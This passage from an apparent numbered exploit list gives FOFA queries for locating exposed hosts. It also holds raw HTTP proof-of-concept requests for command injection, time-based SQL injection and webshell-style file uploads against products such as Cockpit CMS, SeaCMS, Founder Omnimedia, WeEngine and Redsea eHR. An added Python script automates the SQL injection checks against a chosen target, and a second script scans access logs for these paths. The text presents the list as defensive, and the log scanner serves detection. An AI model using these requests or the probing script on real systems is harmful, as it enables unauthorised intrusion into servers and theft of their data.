The sid value decodes to `ls />/www/aaa.txt`, i.e. a backtick-quoted shell command; the request is sent with a LuCI sysauth session cookie. Fetch /aaa.txt from the device to confirm the command ran.

199. Cockpit CMS assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
1. Request the login page to obtain the csfr token (a JWT):
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use that token to log in (the PoC uses the default credentials admin/admin) and obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with that session cookie, then request it:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is served at /storage/uploads/tttt.php; the payload deletes itself after the first request. Note that the upload is authenticated, so the chain only works with valid credentials.

200. SeaCMS (海洋CMS) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Time-based check (MySQL sleep): vulnerable if the response is delayed by about 5 seconds.

201. Founder (方正) Omnimedia News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

TableName decodes to: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH. The table name is concatenated into the query unescaped (stacked MSSQL statements); vulnerable if the response is delayed by about 5 seconds.
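
Entries 189, 191, 200 and 201 are all time-based blind injections whose only signal is a delay, and a single slow request on a loaded server is easy to misread. The script below is an added example (not from the page or any of the vendors) that measures each of the four PoCs several times and decides from medians: the baseline uses the same injection with a 0-second delay, so the only variable is the delay itself. The request builders reproduce the page's paths and payloads exactly; the sampling and decision rule are this example's own design.

```python
"""Time-based blind SQLi verification for the WAITFOR DELAY / sleep() PoCs
(entries 189, 191, 200, 201).  Added example; not the page's own code."""
import http.client
import statistics
import time
import urllib.parse
from typing import Callable, List, Optional, Sequence, Tuple

# A request spec: (method, path, body, content-type).  Paths and payloads are the
# ones in the PoCs above, with the delay in seconds as a parameter.
Spec = Tuple[str, str, Optional[bytes], Optional[str]]


def lanwon_delete_study(delay: int) -> Spec:  # entry 189, MSSQL
    inj = urllib.parse.quote(f"1';WAITFOR DELAY '0:0:{delay}'--", safe=";:")
    return "GET", f"/xds/deleteStudy.php?documentUniqueId={inj}", None, None


def esafenet_navigation_ajax(delay: int) -> Spec:  # entry 191, MSSQL
    form = urllib.parse.urlencode({"command": "nav", "id": f"1'waitfor delay '0:0:{delay}'-- ",
                                   "name": "", "openId": ""})
    # http.client sends the /js/../ segment verbatim, which the PoC relies on.
    return "POST", "/CDGServer3/js/../NavigationAjax", form.encode(), "application/x-www-form-urlencoded"


def seacms_dmku(delay: int) -> Spec:  # entry 200, MySQL
    return ("GET", f"/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep({delay})))v)&type=list",
            None, None)


def founder_binary(delay: int) -> Spec:  # entry 201, MSSQL, stacked statements
    table = (f"DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:{delay}';"
             f"select DOM_IMAGE from IMG_LARGE_PATH")
    form = urllib.parse.urlencode({"TableName": table, "FieldName": "IMG_LARGE_PATH",
                                   "KeyName": "REFID", "KeyID": "1"})
    return "POST", "/newsedit/newsplan/task/binary.do", form.encode(), "application/x-www-form-urlencoded"


def timed_request(host: str, port: int, spec: Spec, timeout: float = 30.0) -> float:
    """Send one request and return wall-clock seconds until the body is fully read."""
    method, path, body, ctype = spec
    headers = {"User-Agent": "Mozilla/5.0", "Connection": "close"}
    if ctype:
        headers["Content-Type"] = ctype
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    start = time.monotonic()
    try:
        conn.request(method, path, body=body, headers=headers)
        conn.getresponse().read()
    finally:
        conn.close()
    return time.monotonic() - start


def is_delayed(baseline: Sequence[float], injected: Sequence[float],
               delay: float, margin: float = 0.5) -> bool:
    """Compare medians, so one slow baseline sample (network jitter) cannot flip the verdict."""
    if not baseline or not injected:
        return False
    return statistics.median(injected) - statistics.median(baseline) >= delay - margin


def probe(host: str, port: int, builder: Callable[[int], Spec],
          delay: int = 5, rounds: int = 3) -> Tuple[bool, List[float], List[float]]:
    """Baseline = same injection with delay 0; injected = the real delay. Returns (verdict, samples)."""
    baseline = [timed_request(host, port, builder(0)) for _ in range(rounds)]
    injected = [timed_request(host, port, builder(delay)) for _ in range(rounds)]
    return is_delayed(baseline, injected, delay), baseline, injected


if __name__ == "__main__":
    import sys
    target, port = (sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"), 80
    for name, builder in [("189 LANWON", lanwon_delete_study), ("191 ESAFENET", esafenet_navigation_ajax),
                          ("200 SeaCMS", seacms_dmku), ("201 Founder", founder_binary)]:
        verdict, base, inj = probe(target, port, builder)
        print(f"{name}: vulnerable={verdict} baseline={base} injected={inj}")
```

Keep the timeout well above the injected delay (30 s against 5 s here); a timeout that fires before the delay ends reads as a failure rather than a delay.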

202. WeEngine (微擎) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
1. Obtain the __VIEWSTATE and __EVENTVALIDATION values from the form:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

2. Substitute those values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The file is then available at /_data/Uploads/1123.txt. The bttnUpload value "上传图片" is the button caption ("Upload image") and is sent as-is; ASP.NET rejects the post if the __VIEWSTATE and __EVENTVALIDATION values do not come from a fresh GET of the same page.

203. Redsea (红海云) eHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
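
The list above is published for defenders to check exposure, and the request lines in it are also usable as detection content. The script below is an added example, not code from the page: it parses web-server access logs in combined/common format and matches the request paths of entries 189 to 203 exactly as they appear in the PoCs. The log lines embedded in it are constructed for the example; the "review" confidence level and the %24%28 variant for entry 198 are this example's own additions.

```python
"""Scan access logs for the PoC request paths of entries 189-203.
Added example for defenders; the sample log lines are constructed."""
import re
from collections import Counter
from typing import Dict, Iterable, List

# Combined/common log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# (entry, confidence, required method or None, pattern over the request path).
# Patterns are the PoC paths above; "review" marks paths a legitimate user may also hit
# (POST bodies are not logged, so those are only a lead, not proof).
INDICATORS = [
    ("189", "high",   None,   re.compile(r"/xds/deleteStudy\.php\?.*(waitfor|%27)", re.I)),
    ("190", "high",   None,   re.compile(r"/index\.php/admin/Userinfo/poihuoqu", re.I)),
    ("191", "high",   None,   re.compile(r"/CDGServer3/.*NavigationAjax", re.I)),
    ("192", "high",   None,   re.compile(r"/JoinfApp/EMail/UploadEmailAttr\?name=\.", re.I)),
    ("193", "high",   None,   re.compile(r"/master/ajaxActions/setSystemTimeAction\.php", re.I)),
    ("194", "high",   None,   re.compile(r"/servlet/uploadAttachmentServlet", re.I)),
    ("195", "high",   None,   re.compile(r"/send_order\.cgi\?parameter=operation", re.I)),
    ("196", "high",   None,   re.compile(r"/cas/userCtl/resetPasswordBySuper", re.I)),
    ("197", "high",   None,   re.compile(r"Quotegask_editAction\.entweb;", re.I)),
    # %60 is the encoded backtick used by the PoC; %24%28 ("$(") is an assumed variant.
    ("198", "high",   None,   re.compile(r"/aliyundrive-webdav/query\?sid=.*(%60|%24%28)", re.I)),
    ("199", "review", "GET",  re.compile(r"/storage/uploads/[^/]+\.php", re.I)),
    ("200", "high",   None,   re.compile(r"/dmplayer/dmku/\?.*sleep\(", re.I)),
    ("201", "review", "POST", re.compile(r"/newsedit/newsplan/task/binary\.do", re.I)),
    ("202", "review", "POST", re.compile(r"/User/AccountEdit\.aspx", re.I)),
    ("203", "high",   None,   re.compile(r"/RedseaPlatform/PtFjk\.mob\?method=upload", re.I)),
]


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one hit per log line that matches an indicator (first matching entry wins)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for entry, confidence, method, pattern in INDICATORS:
            if method and m.group("method") != method:
                continue
            if pattern.search(m.group("path")):
                hits.append({"entry": entry, "confidence": confidence, "ip": m.group("ip"),
                             "method": m.group("method"), "path": m.group("path"),
                             "status": m.group("status"), "time": m.group("ts")})
                break
    return hits


def by_source(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Hits per client address; several entries from one address is the usual scanner signature."""
    return dict(Counter(h["ip"] for h in hits))


# Constructed sample log lines (RFC 5737 addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2024:10:01:02 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/Jun/2024:10:01:09 +0800] "POST /index.php/admin/Userinfo/poihuoqu HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [03/Jun/2024:10:02:40 +0800] "POST /servlet/uploadAttachmentServlet HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [03/Jun/2024:10:02:41 +0800] "GET /storage/uploads/tttt.php HTTP/1.1" 200 4 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Jun/2024:10:03:00 +0800] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [03/Jun/2024:10:03:05 +0800] "GET /User/AccountEdit.aspx HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [03/Jun/2024:10:04:05 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60id%60 HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    found = scan(lines)
    for h in found:
        print(f'[{h["confidence"]}] entry {h["entry"]} {h["ip"]} {h["method"]} {h["path"]} -> {h["status"]}')
    print("per source:", by_source(found))
```

A 200 on a "high" path is worth treating as a confirmed probe; for the "review" paths, correlate with the same address hitting other entries, since a plain GET of AccountEdit.aspx or a user's normal upload will also appear there.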